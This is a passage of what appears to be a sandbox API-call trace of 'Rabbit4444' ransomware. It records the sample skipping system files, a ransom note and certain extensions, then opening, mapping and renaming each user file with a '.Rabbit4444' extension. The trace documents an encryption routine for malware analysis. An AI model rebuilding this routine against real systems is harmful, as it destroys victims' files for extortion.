(lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="Rabbit4444.exe") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2=".") returned 1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="..") returned 1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="windows") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="bootmgr") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="pagefile.sys") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="boot") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="ids.txt") returned -1 [0062.831] lstrcmpiW (lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67", lpString2="NTUSER.DAT") returned -1 [0062.831] lstrcpyW (in: lpString1=0x130ec04, lpString2="6ac60a78-519d-4397-8cfd-8288aad6ad67" | out: lpString1="6ac60a78-519d-4397-8cfd-8288aad6ad67") returned="6ac60a78-519d-4397-8cfd-8288aad6ad67" [0062.831] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67", dwFileAttributes=0x0) returned 1 [0062.831] lstrlenW (lpString="6ac60a78-519d-4397-8cfd-8288aad6ad67") returned 36 [0062.831] lstrlenW (lpString="Rabbit4444") returned 10 [0062.831] lstrcmpiW (lpString1="88aad6ad67", lpString2="Rabbit4444") returned -1 [0062.831] lstrlenW (lpString=".dll") returned 4 [0062.831] lstrcmpiW (lpString1="ad67", lpString2=".dll") returned 1 [0062.832] lstrlenW (lpString=".lnk") returned 4 [0062.832] lstrcmpiW (lpString1="ad67", lpString2=".lnk") returned 1 [0062.832] lstrlenW (lpString=".ini") returned 4 [0062.832] lstrcmpiW (lpString1="ad67", lpString2=".ini") returned 1 [0062.832] lstrlenW (lpString=".sys") returned 4 [0062.832] lstrcmpiW (lpString1="ad67", lpString2=".sys") returned 1 [0062.832] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.832] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.832] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15414276641) returned 1 [0062.832] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1945) returned 1 [0062.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0062.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0062.832] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaa0, lpName=0x0) returned 0x27c [0062.833] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaa0) returned 0x70000 [0062.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0062.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0062.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0062.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0062.835] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15414626191) returned 1 [0062.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0062.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0062.836] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.836] CloseHandle (hObject=0x27c) returned 1 [0062.836] CloseHandle (hObject=0x2a0) returned 1 [0062.836] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67.Rabbit4444") returned 149 [0062.836] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\6ac60a78-519d-4397-8cfd-8288aad6ad67.rabbit4444"), dwFlags=0x1) returned 1 [0062.837] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc478053, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc478053, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdc4ea6a3, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="816b519f-6aae-4806-a871-9e26a12741ef", cAlternateFileName="816B51~1")) returned 1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="Rabbit4444.exe") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2=".") returned 1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="..") returned 1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="windows") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="bootmgr") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="pagefile.sys") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="boot") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="ids.txt") returned -1 [0062.837] lstrcmpiW (lpString1="816b519f-6aae-4806-a871-9e26a12741ef", lpString2="NTUSER.DAT") returned -1 [0062.837] lstrcpyW (in: lpString1=0x130ec04, lpString2="816b519f-6aae-4806-a871-9e26a12741ef" | out: lpString1="816b519f-6aae-4806-a871-9e26a12741ef") returned="816b519f-6aae-4806-a871-9e26a12741ef" [0062.837] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\816b519f-6aae-4806-a871-9e26a12741ef", dwFileAttributes=0x0) returned 1 [0062.837] lstrlenW (lpString="816b519f-6aae-4806-a871-9e26a12741ef") returned 36 [0062.837] lstrlenW (lpString="Rabbit4444") returned 10 [0062.837] lstrcmpiW (lpString1="26a12741ef", lpString2="Rabbit4444") returned -1 [0062.837] lstrlenW (lpString=".dll") returned 4 [0062.838] lstrcmpiW (lpString1="41ef", lpString2=".dll") returned 1 [0062.838] lstrlenW (lpString=".lnk") returned 4 [0062.838] lstrcmpiW (lpString1="41ef", lpString2=".lnk") returned 1 [0062.838] lstrlenW (lpString=".ini") returned 4 [0062.838] lstrcmpiW (lpString1="41ef", lpString2=".ini") returned 1 [0062.838] lstrlenW (lpString=".sys") returned 4 [0062.838] lstrcmpiW (lpString1="41ef", lpString2=".sys") returned 1 [0062.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\816b519f-6aae-4806-a871-9e26a12741ef" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\816b519f-6aae-4806-a871-9e26a12741ef"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.838] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.838] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15414880787) returned 1 [0062.838] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3184) returned 1 [0062.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0062.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0062.838] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf70, lpName=0x0) returned 0x27c [0062.839] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf70) returned 0x70000 [0062.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0062.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0062.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0062.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0062.841] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15415127025) returned 1 [0062.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0062.841] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0062.841] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.841] CloseHandle (hObject=0x27c) returned 1 [0062.841] CloseHandle (hObject=0x2a0) returned 1 [0062.841] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\816b519f-6aae-4806-a871-9e26a12741ef.Rabbit4444") returned 149 [0062.841] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\816b519f-6aae-4806-a871-9e26a12741ef" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\816b519f-6aae-4806-a871-9e26a12741ef"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\816b519f-6aae-4806-a871-9e26a12741ef.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\816b519f-6aae-4806-a871-9e26a12741ef.rabbit4444"), dwFlags=0x1) returned 1 [0062.842] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde328425, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xde328425, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xde328425, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x12a32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="af440790-6f0a-42ac-b8a5-e53856d9d828", cAlternateFileName="AF4407~1")) returned 1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="Rabbit4444.exe") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2=".") returned 1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="..") returned 1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="windows") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="bootmgr") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="pagefile.sys") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="boot") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="ids.txt") returned -1 [0062.842] lstrcmpiW (lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828", lpString2="NTUSER.DAT") returned -1 [0062.842] lstrcpyW (in: lpString1=0x130ec04, lpString2="af440790-6f0a-42ac-b8a5-e53856d9d828" | out: lpString1="af440790-6f0a-42ac-b8a5-e53856d9d828") returned="af440790-6f0a-42ac-b8a5-e53856d9d828" [0062.842] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828", dwFileAttributes=0x0) returned 1 [0062.842] lstrlenW (lpString="af440790-6f0a-42ac-b8a5-e53856d9d828") returned 36 [0062.842] lstrlenW (lpString="Rabbit4444") returned 10 [0062.842] lstrcmpiW (lpString1="3856d9d828", lpString2="Rabbit4444") returned -1 [0062.842] lstrlenW (lpString=".dll") returned 4 [0062.842] lstrcmpiW (lpString1="d828", lpString2=".dll") returned 1 [0062.842] lstrlenW (lpString=".lnk") returned 4 [0062.842] lstrcmpiW (lpString1="d828", lpString2=".lnk") returned 1 [0062.842] lstrlenW (lpString=".ini") returned 4 [0062.843] lstrcmpiW (lpString1="d828", lpString2=".ini") returned 1 [0062.843] lstrlenW (lpString=".sys") returned 4 [0062.843] lstrcmpiW (lpString1="d828", lpString2=".sys") returned 1 [0062.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.843] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.843] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15415372673) returned 1 [0062.843] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76338) returned 1 [0062.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0062.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0062.843] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12d40, lpName=0x0) returned 0x27c [0062.844] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12d40) returned 0x70000 [0062.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0062.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0062.849] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0062.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0062.849] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15416018576) returned 1 [0062.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0062.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0062.850] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.850] CloseHandle (hObject=0x27c) returned 1 [0062.850] CloseHandle (hObject=0x2a0) returned 1 [0062.850] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828.Rabbit4444") returned 149 [0062.850] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\af440790-6f0a-42ac-b8a5-e53856d9d828.rabbit4444"), dwFlags=0x1) returned 1 [0062.851] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd062fb2, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdd062fb2, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdd206830, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1dd87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bba8ff68-64fb-4605-ae42-fe59570f7bb7", cAlternateFileName="BBA8FF~1")) returned 1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="Rabbit4444.exe") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2=".") returned 1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="..") returned 1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="windows") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="bootmgr") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="pagefile.sys") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="boot") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="ids.txt") returned -1 [0062.851] lstrcmpiW (lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7", lpString2="NTUSER.DAT") returned -1 [0062.851] lstrcpyW (in: lpString1=0x130ec04, lpString2="bba8ff68-64fb-4605-ae42-fe59570f7bb7" | out: lpString1="bba8ff68-64fb-4605-ae42-fe59570f7bb7") returned="bba8ff68-64fb-4605-ae42-fe59570f7bb7" [0062.851] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7", dwFileAttributes=0x0) returned 1 [0062.852] lstrlenW (lpString="bba8ff68-64fb-4605-ae42-fe59570f7bb7") returned 36 [0062.852] lstrlenW (lpString="Rabbit4444") returned 10 [0062.852] lstrcmpiW (lpString1="59570f7bb7", lpString2="Rabbit4444") returned -1 [0062.852] lstrlenW (lpString=".dll") returned 4 [0062.852] lstrcmpiW (lpString1="7bb7", lpString2=".dll") returned 1 [0062.852] lstrlenW (lpString=".lnk") returned 4 [0062.852] lstrcmpiW (lpString1="7bb7", lpString2=".lnk") returned 1 [0062.852] lstrlenW (lpString=".ini") returned 4 [0062.852] lstrcmpiW (lpString1="7bb7", lpString2=".ini") returned 1 [0062.852] lstrlenW (lpString=".sys") returned 4 [0062.852] lstrcmpiW (lpString1="7bb7", lpString2=".sys") returned 1 [0062.852] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.852] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.852] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15416317092) returned 1 [0062.852] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=122247) returned 1 [0062.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0062.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0062.853] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1e090, lpName=0x0) returned 0x27c [0062.854] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e090) returned 0x70000 [0062.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0062.862] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0062.862] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0062.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0062.863] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15417338400) returned 1 [0062.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0062.863] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0062.863] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.864] CloseHandle (hObject=0x27c) returned 1 [0062.864] CloseHandle (hObject=0x2a0) returned 1 [0062.864] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7.Rabbit4444") returned 149 [0062.864] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7"), 